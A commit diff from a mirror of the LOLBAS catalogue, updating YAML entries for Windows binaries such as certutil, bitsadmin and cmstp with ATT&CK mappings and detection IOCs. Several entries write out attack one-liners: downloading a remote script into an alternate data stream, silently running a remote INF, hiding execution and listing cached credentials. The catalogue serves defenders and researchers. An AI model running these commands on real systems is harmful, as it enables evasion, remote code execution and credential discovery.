public-mirrors/LOLBAS
1
0
Fork 0
mirror of https://github.com/LOLBAS-Project/LOLBAS synced 2025-07-26 20:22:24 +02:00
Code Issues Projects Releases Wiki Activity

Update readme, began updating OSBins with new template

Browse Source
This commit is contained in:
Oddvar Moe
2018-09-24 01:50:14 +02:00
parent e8c7042468
commit adafa6de3f
17 changed files with 234 additions and 121 deletions
Download Patch File Download Diff File Expand all files Collapse all files

33
yml/OSBinaries/Atbroker.yml
View File

@@ -1,20 +1,29 @@
---
Name: Atbroker.exe
Description: Execute
Author: ''
Description: Helper binary for Assistive Technology (AT)
Author: 'Oddvar Moe'
Created: '2018-05-25'
Categories: []
Commands:
- Command: ATBroker.exe /start malware
Description: Start a registered Assistive Technology (AT).
Usecase: Executes code defined in registry for a new AT. Modifications must be made to the system registry to either register or modify an existing Assistibe Technology (AT) service entry.
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows 8, Windows 8.1, Windows 10
Full Path:
- C:\Windows\System32\Atbroker.exe
- C:\Windows\SysWOW64\Atbroker.exe
Code Sample: []
Detection: []
- path: C:\Windows\System32\Atbroker.exe
- path: C:\Windows\SysWOW64\Atbroker.exe
Code Sample:
- Code:
Detection:
- IOC: Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration
- IOC: Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs
- IOC: Unknown AT starting C:\Windows\System32\ATBroker.exe /start malware
Resources:
- http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/
Notes: >
Thanks to Adam - @hexacorn
Modifications must be made to the system registry to either register or modify an existing Assistibe Technology (AT) service entry.
- Link: http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/
Acknowledgement:
- Person: Adam
Handle: '@hexacorn'
---

38
yml/OSBinaries/Bash.yml
View File

@@ -1,17 +1,35 @@
---
Name: Bash.exe
Description: Execute
Author: ''
Description: File used by Windows subsystem for Linux
Author: 'Oddvar Moe'
Created: '2018-05-25'
Categories: []
Commands:
- Command: bash.exe -c calc.exe
Description: Execute calc.exe.
Description: Executes calc.exe from bash.exe
Usecase: Performs execution of specified file, can be used as a defensive evasion.
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows 10
- Command: bash.exe -c calc.exe
Description: Executes calc.exe from bash.exe
Usecase: Performs execution of specified file, can be used to bypass Application Whitelisting.
Category: AWL Bypass
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows 10
Full Path:
- '?'
Code Sample: []
Detection: []
- path: C:\Windows\System32\bash.exe
- path: C:\Windows\SysWOW64\bash.exe
Code Sample:
- Code:
Detection:
- IOC: Child process from bash.exe
Resources:
- ''
Notes: Thanks to ?
- Link: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
Acknowledgement:
- Person: Alex Ionescu
Handle: '@aionescu'
---

83
yml/OSBinaries/Bitsadmin.yml
View File

@@ -1,36 +1,59 @@
---
Name: Bitsadmin.exe
Description: Execute, Download, Copy, Read ADS
Author: ''
Name: bitsadmin.exe
Description: Used for managing background intelligent transfer
Author: 'Oddvar Moe'
Created: '2018-05-25'
Categories: []
Commands:
- Command: |
bitsadmin /create 1
bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe
bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL
bitsadmin /RESUME 1
bitsadmin /complete 1
- Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.
- Command: |
bitsadmin /create 1
bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe
bitsadmin /RESUME 1
bitsadmin /complete 1
- Command: bitsadmin /create 1 bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL bitsadmin /RESUME 1 bitsadmin /complete 1
Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command from an Alternate data stream, then resume and complete the job.
Usecase: Performs execution of specified file in the alternate data stream, can be used as a defensive evasion or persistence technique.
Category: Alternate data streams
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1
Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.
- Command: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /RESUME 1 & bitsadmin /Complete 1 & bitsadmin /reset
Description: One-liner version that creates a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.
- Command: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL & bitsadmin /RESUME 1 & bitsadmin /Reset
Description: One-Liner version that creates a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.
Usecase: Download file from Internet
Category: Download
Privileges: User
MitreID: T1105
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /RESUME 1 & bitsadmin /Complete 1 & bitsadmin /reset
Description: Command for copying cmd.exe to another folder
Usecase: Copy file
Category: Copy
Privileges: User
MitreID: T1105
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\cmd.exe NULL & bitsadmin /RESUME 1 & bitsadmin /Reset
Description: One-liner that creates a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.
Usecase: Execute binary file specified. Can be used as a defensive evasion.
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
- c:\Windows\System32\bitsadmin.exe
- c:\Windows\SysWOW64\bitsadmin.exe
Code Sample: []
Detection: []
- path: C:\Windows\System32\bitsadmin.exe
- path: C:\Windows\SysWOW64\bitsadmin.exe
Code Sample:
- Code:
Detection:
- IOC: Child process from bitsadmin.exe
- IOC: bitsadmin creates new files
- IOC: bitsadmin adds data to alternate data stream
Resources:
- https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679
- Slide 53
- https://www.youtube.com/watch?v=_8xJaaQlpBo
- https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
Notes: Thanks to Rob Fuller - @mubix , Chris Gates - @carnal0wnage, Oddvar Moe - @oddvarmoe
- Link: https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679 - slide 53
- Link: https://www.youtube.com/watch?v=_8xJaaQlpBo
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
Acknowledgement:
- Person: Rob Fuller
Handle: '@mubix'
- Person: Chris Gates
Handle: '@carnal0wnage'
- Person: Oddvar Moe
Handle: '@oddvarmoe'
---

63
yml/OSBinaries/Certutil.yml
View File

@@ -1,25 +1,56 @@
---
Name: Certutil.exe
Description: Download, Add ADS, Decode, Encode
Author: ''
Description: Windows binary used for handeling certificates
Author: 'Oddvar Moe'
Created: '2018-05-25'
Categories: []
Commands:
- Command: certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe
Description: Download and save 7zip to disk in the current folder.
- Command: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
Usecase: Download file from Internet
Category: Download
Privileges: User
MitreID: T1105
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
Description: Download and save a PS1 file to an Alternate Data Stream (ADS).
- Command: |
certutil -encode inputFileName encodedOutputFileName
certutil -decode encodedInputFileName decodedOutputFileName
Description: Commands to encode and decode a file using Base64.
Usecase: Download file from Internet and save it in an NTFS Alternate Data Stream
Category: Alternate data streams
Privileges: User
MitreID: T1105
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: certutil -encode inputFileName encodedOutputFileName
Description: Command to encode a file using Base64
Usecase: Encode files to evade defensive measures
Category: Encode
Privileges: User
MitreID: T1027
MitreLink: https://attack.mitre.org/wiki/Technique/T1027
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: certutil -decode encodedInputFileName decodedOutputFileName
Description: Command to decode a Base64 encoded file.
Usecase: Decode files to evade defensive measures
Category: Decode
Privileges: User
MitreID: T1140
MitreLink: https://attack.mitre.org/wiki/Technique/T1140
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
- c:\windows\system32\certutil.exe
- c:\windows\sysWOW64\certutil.exe
Code Sample: []
Detection: []
- path: C:\Windows\System32\certutil.exe
- path: C:\Windows\SysWOW64\certutil.exe
Code Sample:
- Code:
Detection:
- IOC: Certutil.exe creating new files on disk
- IOC: Useragent Microsoft-CryptoAPI/10.0
- IOC: Useragent CertUtil URL Agent
Resources:
- https://twitter.com/Moriarty_Meng/status/984380793383370752
- https://twitter.com/mattifestation/status/620107926288515072
Notes: Thanks to Matt Graeber - @mattifestation, Moriarty - @Moriarty2016
- Link: https://twitter.com/Moriarty_Meng/status/984380793383370752
- Link: https://twitter.com/mattifestation/status/620107926288515072
Acknowledgement:
- Person: Matt Graeber
Handle: '@mattifestation'
- Person: Moriarty
Handle: '@moriarty2016'
---

34
yml/OSBinaries/Cmdkey.yml
View File

@@ -1,18 +1,28 @@
---
Name: Cmdkey.exe
Description: Credentials
Author: ''
Name: Cmdkey.exe
Description: creates, lists, and deletes stored user names and passwords or credentials.
Author: 'Oddvar Moe'
Created: '2018-05-25'
Categories: []
Commands:
- Command: cmdkey /list
Description: List cached credentials.
Description: List cached credentials
Usecase: Get credential information from host
Category: Credentials
Privileges: User
MitreID: T1078
MitreLink: https://attack.mitre.org/wiki/Technique/T1078
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
- c:\windows\system32\cmdkey.exe
- c:\windows\sysWOW64\cmdkey.exe
Code Sample: []
Detection: []
- path: C:\Windows\System32\cmdkey.exe
- path: C:\Windows\SysWOW64\cmdkey.exe
Code Sample:
- Code:
Detection:
- IOC: Usage of this command could be and IOC
Resources:
- https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation
Notes: ''
- Link: https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation
- Link: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmdkey
Acknowledgement:
- Person:
Handle:
---

49
yml/OSBinaries/Cmstp.yml
View File

@@ -1,26 +1,43 @@
---
Name: Cmstp.exe
Description: Execute, UACBypass
Author: ''
Description: Installs or removes a Connection Manager service profile.
Author: 'Oddvar Moe'
Created: '2018-05-25'
Categories: []
Commands:
- Command: cmstp.exe /ni /s c:\cmstp\CorpVPN.inf
Description: Silently installs a specially formatted local .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
Usecase: Execute code hidden within an inf file. Download and run scriptlets from internet.
Category: Execute
Privileges: User
MitreID: T1191
MitreLink: https://attack.mitre.org/wiki/Technique/T1191
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf
Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
Usecase: Execute code hidden within an inf file. Execute code directly from Internet.
Category: AwL bypass
Privileges: User
MitreID: T1191
MitreLink: https://attack.mitre.org/wiki/Technique/T1191
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
- C:\Windows\system32\cmstp.exe
- C:\Windows\sysWOW64\cmstp.exe
Code Sample: []
Detection: []
- path: C:\Windows\System32\cmstp.exe
- path: C:\Windows\SysWOW64\cmstp.exe
Code Sample:
- Code:
Detection:
- IOC: Execution of cmstp.exe should not be normal unless VPN is in use
- IOC: Cmstp.exe communication towards internet and getting files
Resources:
- https://twitter.com/NickTyrer/status/958450014111633408
- https://gist.github.com/NickTyrer/bbd10d20a5bb78f64a9d13f399ea0f80
- https://gist.github.com/api0cradle/cf36fd40fa991c3a6f7755d1810cc61e
- https://oddvar.moe/2017/08/15/research-on-cmstp-exe/
- https://gist.githubusercontent.com/tylerapplebaum/ae8cb38ed8314518d95b2e32a6f0d3f1/raw/3127ba7453a6f6d294cd422386cae1a5a2791d71/UACBypassCMSTP.ps1
(UAC Bypass)
- https://github.com/hfiref0x/UACME
Notes: Thanks to Oddvar Moe - @oddvarmoe, Nick Tyrer - @NickTyrer
- Link: https://twitter.com/NickTyrer/status/958450014111633408
- Link: https://gist.github.com/NickTyrer/bbd10d20a5bb78f64a9d13f399ea0f80
- Link: https://gist.github.com/api0cradle/cf36fd40fa991c3a6f7755d1810cc61e
- Link: https://oddvar.moe/2017/08/15/research-on-cmstp-exe/
- Link: https://gist.githubusercontent.com/tylerapplebaum/ae8cb38ed8314518d95b2e32a6f0d3f1/raw/3127ba7453a6f6d294cd422386cae1a5a2791d71/UACBypassCMSTP.ps1
- Link: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmstp
Acknowledgement:
- Person: Oddvar Moe
Handle: '@oddvarmoe'
- Person: Nick Tyrer
Handle: '@NickTyrer'
---